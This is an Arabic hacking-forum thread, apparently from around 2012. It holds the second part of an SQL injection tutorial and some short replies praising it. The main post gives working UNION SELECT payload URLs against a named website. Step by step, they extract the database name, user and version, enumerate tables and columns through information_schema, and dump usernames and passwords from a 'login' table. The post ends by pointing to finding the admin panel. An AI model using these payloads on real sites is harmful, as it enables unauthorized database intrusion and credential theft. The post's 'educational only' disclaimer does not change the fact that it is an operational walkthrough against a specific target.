اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغرة sql ج 2

ثغرة sql ج 2


النتائج 1 إلى 7 من 7

الموضوع: ثغرة sql ج 2

  1. #1
    هكر مجتهد Array الصورة الرمزية Omar hcj
    تاريخ التسجيل
    Feb 2012
    الدولة
    سوريا
    المشاركات
    541

    افتراضي ثغرة sql ج 2



    بسم الله الرحمن الرحيم
    والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
    وبسم الله نبدأ اعوذ بالله من الشيطان الرجيم بسم الله الرحمن الرحيم
    والحمد لله الذي هدانا الى هذا وما كنا لنهتدي لو لم يهدينا الله
    السلام عليكم ورحمة الله وبركاته
    ثغرة sql جزء 2
    انا شرحت لكم ثغرة sql جزء 1
    وقمنا بشرح معرفة الموقع اذا كان مصاب بهذه الثغرة sql ام لا و تعلمنا كيفية معرفة عدد الأعمدة و معرفة الأعمدة المصابة لمشاهدة الموضوع اضغط هنا
    اليوم شرحنا موسع جدا جدا ويجب تشغيل العقل 100% فاليوم الدرس الاخير لمعرفة هذه الثغرة
    سنتعلم كيفية استخراج اسم القاعدة و اسم مستخدم القاعدة و إصدار القاعدة إضافة الى ذلك معرفة عدد جداول القاعدة + معرفة اعمدة الجداول + استخراج ال user و pass
    الدرس طويل جدا ولكن انا متأكد لن تخرج قبل فهمه ولكن اول شئ عليك صبر و التركيز ولا داعي للتفكير بشرح روابط
    نبدأ على بركة لله عز وجل:
    اولا)أستخراج أسم القاعدة و إصدار القاعدة واسم مستخدم القاعدة في أمر واحد
    لدينا هذا الموقع evt-me.com/newsDetail.php?id=8
    وقد قمنا في الدرس السابق معرفة الأعمدة المصابة
    ووجدنا ان الأعمدة المصابة هي 2 +3
    والان نقوم بحذف العمود 2 من رابط ونضع بدل منه
    كود HTML:
    concat(database(),0x3e,user(),0x3e,@@version)
    بمعنا اخر يصبح الرابط
    كود HTML:
    http://www.evt-me.com/newsDetail.php?id=-8 union select 1,concat(database(),0x3e,user(),0x3e,@@version),3,4,5,6,7--
    database():لاستخراج اسم القاعدة:evt_evt
    user():استخراج اسم مستخدم القاعدة: [email protected]
    [email protected]@:معرفة إصدار القاعدة:5.1.63-cll
    اما بالنسبة ل 0x3e فهي لتفصل بين كل واحد يعني مشان ما يطلعوا كلهم جملة واحد


    ثانيا)أستخراج أسماء الجداول من اسم القاعدة
    عن طريق الإمر التالي لاحظوو
    كود HTML:
    concat(table_name)
    نحذف الامر السابق ونضع الكود الموجود في الاعلى لأستخراج اسماء الجداول من اسم القاعدة
    ونضع في نهاية رابط قبل ال - -
    from information_schema.tables where table_schema=اسم القاعدة المشفر
    لدينا هذا الموقع
    لمشاهدة الموقع أضغط هنا
    هذا موقع لتشفير تضغط اولا على sql char encoder الموجودة في يسار الصفحة
    ونكتب اسم القاعدة فيقوم بتشفيرها ثم نضع التشفير بدل من كلمة ((اسم القاعدة المشفر))
    اذا يصبح الكود في النهاية
    كود HTML:
    from information_schema.tables where table_schema=0x6576745f657674
    تمااااام
    اذا الموقع في النهاية هكذا
    كود HTML:
    http://evt-me.com/newsDetail.php?id=-8 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=0x6576745f657674
    استخرجنا الان اسماء الجداول من القاعدة غالبا يكون ال username & pass
    في جدول Login او user وغيرها ...يعني بتكون واضحة جدا
    نجد اسماء الجداول كثار ولكن انا وجدت في هذا الموقع جدول باسم login
    اذا هذا الذي فيه ال user و pass
    بقي خطوتان فقط ونعرف ال pass & user مممممم
    الخطوة الأولى) معرفة اسماء الأغمدة في جدول login اولا نذهب لموقع التشفير و نشفر كلمة Login
    ثم نقوم بمحي ما كتبناه في العمود 2
    ووضع
    كود HTML:
    group_concat(column_name)
    والان نضع في نهاية رابط قبل - - ما يلي
    كود HTML:
    from information_schema.columns where table_name=0x6c6f67696e
    0x6c6f67696e اسم الجدول login مشفر اذا نحذف ما كتبناه سابقا و نضع الكود الموجود حالي اي يصبح الرابط في النهاية
    كود HTML:
    http://www.evt-me.com/newsDetail.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=0x6c6f67696e
    نجد انه قد استخرج لنا اسماء العواميد كلها
    id
    pass
    username
    position
    fullname
    اكيد انا محتاج username و pass اما fullname فأكيد ما بدي لانو ما بدي اتعرف على admin ههههه
    طيب والان الخطوة الاخيرة
    تضع بدل العمود المصاب 2 هذا الكود
    كود HTML:
    concat(pass,0x3e,username)
    طيب اكيد username و pass حسب ما تجدهم بالجدول
    يعني لو جدتهم
    user
    password
    كان بدك تكتب هيك
    (
    كود HTML:
    concat(pass,0x3e,user
    على حسب ما مكتوب بتكتب تمااام
    والان نكتب في نهاية الرابط قبل ال - - ما يلي
    كود HTML:
    from login
    طبعا على حسب اسم الجدول يعني لو كان user كان from user
    الفكرة وصلت
    والان نضغط على Enter ومبروك عليك ال pass&user
    والان نذهب لبرنامج الهافج مشان نلاقي مسار لوحة التحكم
    طبعا الشباب شارحين عليه كثير واذا طلبتوا مني بعطيك شرح وافي
    انا برئ من كل من يستخدم الطريقة ضد العرب و المسلمون
    الغرض تعليمي فقط..
    الحمد لله الذي علمنا هذا و جعلنا نعلم غيرنا
    لا إله الا انت سبحانك إني كنت من الظالمين
    للأسئلة و الأستفسارات اترك تعليق يتضمن السؤال وان شاء الله سيتم الرد
    او ارسل رسالة على البريد الإلكتروني
    [email protected]
    facebook:Omar Al Lord
    والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
    بالله عليك لا تخرج قبل ان تصلي على نبي 3 مرات مو ضروري تكتبهم بتعليق ولكن في قلبك
    والحمد لله رب العرش العظيم
    وشكرا جزيلا على القراءة
    حفظكم الله وهداكم وهدانا
    والسلام عليكم ورحمة الله وبركاته
    لا تنسونا من الدعاء
    تحياتي





  2. #2
    هكر متميز Array الصورة الرمزية موآدع
    تاريخ التسجيل
    Jul 2012
    الدولة
    السعودية | جـــدة
    المشاركات
    720

    افتراضي رد: ثغرة sql ج 2

    مشاء الله موضوع جميل يعطيك العافية
    عجبني ترتيب الموضوع


  3. #3
    هكر متميز Array الصورة الرمزية Mr.nakad
    تاريخ التسجيل
    Feb 2012
    المشاركات
    1,105

    افتراضي رد: ثغرة sql ج 2

    تنسيق جميل

    لكن ما حبيت اتابع هالموضوع الا لين افهم الموضوع اللي قبله

    تقبل مروري



  4. #4
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغرة sql ج 2

    مشكور وماقصرت ...........


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2012
    المشاركات
    41

    افتراضي رد: ثغرة sql ج 2

    مشكور يا بطل

    الله يعطيك العافية


  6. #6
    هكر مجتهد Array الصورة الرمزية BIG_BOSS_X2IP
    تاريخ التسجيل
    Apr 2012
    الدولة
    بـيـتـنـآ
    المشاركات
    627

    افتراضي رد: ثغرة sql ج 2

    ما شاء الله
    موضوع رائع و طرح ولا اروع
    الله يعطيك العافيه



  7. #7
    هكر مجتهد Array الصورة الرمزية BIG_BOSS_X2IP
    تاريخ التسجيل
    Apr 2012
    الدولة
    بـيـتـنـآ
    المشاركات
    627

    افتراضي رد: ثغرة sql ج 2

    جزاك الله خيراااااااا


المواضيع المتشابهه

  1. ثغرة sql ج1
    بواسطة Omar hcj في المنتدى قسم الثغرات
    مشاركات: 7
    آخر مشاركة: 08-09-2012, 07:35 PM
  2. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  3. ثغرة remote file inclusion +ثغرة جديدة +طريقة الإستغلال
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 17
    آخر مشاركة: 01-29-2012, 12:11 AM
  4. ثغرة لرفع الشيل مباشرة ثغرة ابلود upload
    بواسطة The shadow في المنتدى قسم الثغرات
    مشاركات: 20
    آخر مشاركة: 12-21-2011, 06:05 AM
  5. هل هذه ثغرة
    بواسطة طير الباز في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 5
    آخر مشاركة: 05-13-2011, 09:27 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات SQL

ثغرة SQL

كيفية معرفة عدد الاعمدةشرح استخراج القاعدة بثغرة كيفية معرفة sql موقعشرح ثغرة sqlشرح تغرة sql معرفة الموقع اذا مصاب بثغرة سكويلثغرات mysql 2012اختراق المواقع الالكترونية عبر ثغرة sql خطوة خطوةثغرات SQL databaseثغران sqlموقع تشفير sqlثغرات sql للهافجاختراق 5.1.63-cllمعرفت اذا الموقع مصاب بثغره او لا شرج بالصورمعرفت اذا الموقع مصاب بثغره او لاavp fhgw vm luvtj h`h hgl ru lwhf feyvi hojvhr h ghبرنامج استخراج ثغرات موقعك كاملهطريقه شرح اذا الموقع في ثغراتaljyyosh sqli شرحكيفية استخراج الأعمدة المصابة في SQLشرح استخراج ثغرت sqlثغرة sql بتاريخ اليومطريقه معرفه الموقع المصاب بثغرات

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •